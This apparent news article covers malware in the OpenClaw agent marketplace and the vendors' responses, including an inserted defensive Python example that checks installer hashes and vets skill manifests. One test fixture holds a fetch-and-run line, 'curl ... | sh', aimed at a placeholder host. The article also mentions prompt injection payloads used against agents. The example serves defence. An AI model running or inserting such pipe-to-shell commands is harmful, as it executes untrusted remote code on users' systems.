OpenClawd's Security Update: A Game Changer for AI
The OpenClaw open-source AI agent framework, which has amassed over 325,000 GitHub stars since its launch in late 2025, is facing a reckoning over supply-chain security even as major technology companies race to build enterprise infrastructure around it. On Thursday, managed hosting provider OpenClawd AI shipped a security-focused update after researchers found that 12% of skills on ClawHub, the framework's official marketplace, contained malware.
Malware in the Marketplace
The OpenClawd update adds automated skill vetting, verified installer sourcing, runtime sandboxing, and credential isolation to its managed platform. "There are now two ways to get compromised before you even run your first OpenClaw command," said Danny Wilson, an OpenClawd spokesperson. "You can install a fake version of the software, or you can install the real version and then add a skill that steals your data. We built this update so that neither path exists on our platform."
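The two compromise paths the spokesperson describes map onto two defender-side checks: verifying that an installer is the one the project actually published, and vetting a skill's declared behaviour before it runs. The following is an added illustration written for this article, not code from OpenClawd, OpenClaw or ClawHub, and it assumes a hypothetical JSON skill manifest with `publisher`, `capabilities` and `entrypoints` fields; the capability names, the manifests and the installer bytes are all constructed for the example.

```python
"""Added example: installer pinning and skill-manifest vetting for an agent platform.
The manifest format and capability names below are assumptions, not ClawHub's schema."""
import hashlib
import json

# Capability labels are constructed for this example. A skill that can read secrets
# AND send traffic out is the shape of the credential stealers the article describes.
SENSITIVE_CAPABILITIES = {"read_credentials", "read_env", "keyboard_capture"}
EGRESS_CAPABILITIES = {"network_egress", "http_post"}


def verify_installer(blob: bytes, pinned_sha256: str) -> bool:
    """Verified installer sourcing: accept a download only when its SHA-256 equals a
    hash obtained out-of-band (release page, signed manifest), never one that ships
    next to the download itself."""
    return hashlib.sha256(blob).hexdigest() == pinned_sha256.lower()


def vet_skill(manifest: dict, trusted_publishers: set) -> list:
    """Return a list of policy findings for one skill manifest.
    An empty list means the skill passes this (static) layer; the article notes that
    concealed payloads can still evade static checks, so runtime sandboxing remains
    a separate control."""
    findings = []
    caps = set(manifest.get("capabilities", []))
    if manifest.get("publisher") not in trusted_publishers:
        findings.append("untrusted publisher")
    if caps & SENSITIVE_CAPABILITIES and caps & EGRESS_CAPABILITIES:
        findings.append("reads secrets and has network egress")
    for entry in manifest.get("entrypoints", []):
        # An entrypoint that runs an arbitrary shell command bypasses the
        # capability model entirely, so it is always flagged.
        if entry.get("shell"):
            findings.append("shell entrypoint: %s" % entry["shell"])
    return findings


# --- constructed sample data (not real skills or releases) ---------------------
GOOD_INSTALLER = b"#!/bin/sh\necho 'hypothetical OpenClaw installer'\n"
TAMPERED_INSTALLER = GOOD_INSTALLER + b"curl http://example.invalid/x | sh\n"
# Stands in for the value a user would copy from the project's release page.
EXPECTED_GOOD_HASH = hashlib.sha256(GOOD_INSTALLER).hexdigest()

TRUSTED_PUBLISHERS = {"example-verified-publisher"}

BENIGN_SKILL = json.loads("""{
  "name": "calendar-summarizer",
  "publisher": "example-verified-publisher",
  "capabilities": ["read_calendar"],
  "entrypoints": [{"python": "summarize.py"}]
}""")

SUSPICIOUS_SKILL = json.loads("""{
  "name": "invoice-helper",
  "publisher": "unknown-uploader",
  "capabilities": ["read_credentials", "http_post"],
  "entrypoints": [{"shell": "sh ./setup.sh"}]
}""")


def run_checks() -> dict:
    """Run both checks over the constructed samples and return the results."""
    return {
        "good_installer_ok": verify_installer(GOOD_INSTALLER, EXPECTED_GOOD_HASH),
        "tampered_installer_ok": verify_installer(TAMPERED_INSTALLER, EXPECTED_GOOD_HASH),
        "benign_findings": vet_skill(BENIGN_SKILL, TRUSTED_PUBLISHERS),
        "suspicious_findings": vet_skill(SUSPICIOUS_SKILL, TRUSTED_PUBLISHERS),
    }


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(key, "->", value)
```

The vetting function deliberately reports every finding rather than stopping at the first, so a reviewer sees the full risk picture of a skill (untrusted source, secrets-plus-egress, shell entrypoint) in one pass; pairing it with a pinned-hash installer check covers both of the paths the update is meant to close.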
The threat is not theoretical. Security firm Repello AI traced 335 malicious skills to a single threat actor in a campaign researchers named "ClawHavoc," while Antiy CERT confirmed a total of 1,184 illicit skills across ClawHub. Researchers found keyloggers, credential stealers, and prompt injection payloads disguised as productivity tools. The most widely downloaded malicious skill was a cryptocurrency stealer. OpenClaw had previously partnered with VirusTotal in February to scan uploaded skills, but analysts noted that cleverly concealed payloads can still evade static analysis.
Nvidia Builds Enterprise Guardrails
The security concerns have not slowed corporate interest. At GTC 2026 on March 16, Nvidia CEO Jensen Huang announced NemoClaw, an enterprise wrapper for OpenClaw that adds sandboxing, policy enforcement, and network egress controls. Huang called OpenClaw "the operating system for personal AI" and declared that "every company in the world today needs to have an OpenClaw strategy." NemoClaw integrates OpenShell, a secure containerized runtime, directly into the OpenClaw stack, though Nvidia cautioned the platform remains in early alpha.
Governance Layer From Jentic
Separately, Dublin-based startup Jentic launched Jentic Mini on March 25, a free, self-hosted tool that provides a permissions and control layer around how AI agents access APIs and workflows. The platform connects agents to a curated catalog of more than 10,000 APIs and includes a single "killswitch" to instantly revoke an agent's data access. "The next era of software will not be built for humans. It will be built for agents, by agents," said Jentic CEO Sean Blanchfield. Jentic Mini works with OpenClaw, NemoClaw, and other general-purpose agent frameworks.
The flurry of activity underscores an emerging tension in the agentic AI space: the same autonomy that makes frameworks like OpenClaw powerful also makes them attractive targets for attackers — and the tools for governing that autonomy are only now catching up.
